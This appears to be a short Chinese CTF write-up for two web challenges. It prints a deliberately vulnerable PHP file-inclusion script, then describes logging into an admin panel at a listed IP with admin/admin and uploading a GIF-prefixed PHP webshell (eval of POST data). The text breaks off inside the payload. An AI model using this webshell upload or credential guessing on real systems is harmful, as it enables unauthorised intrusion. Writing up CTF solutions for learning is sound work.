web
web1 题目名字不重要反正题挺简单的
就在phpinfo里面 。。。。
源码放一下 感觉200分没这么好拿的样子,可能有别的解法。
<?php
error_reporting(0);
//I heard you are good at PHPINFO+LFI, flag is in flag.php, find it my dear noob vegetable hacker.
if ( isset($_GET['file']) ) {
$file = $_GET['file'];
if ( $file === "phpinfo" ) {
phpinfo();
exit;
}
if ( preg_match('/proc/i' , $file) ) {
die("private");
}
$file = "/var/www/html/" . $file;
$content = file_get_contents($file);
if ( !$content ) {
die("nothing");
}
if ( preg_match("/script|<\?/i", $content) ) {
die("bypass me");
}
include_once $file;
} else {
highlight_file(__FILE__);
}
web4
直接/admin进入后台界面
弱密码
admin/admin
登录后台,直接点击不了,直接源代码里面去点
进入管理员资料管理
http://47.111.104.99:50400/admin/?r=manageinfo
上传图片
GIF89a
<script language="php">eval($_POST[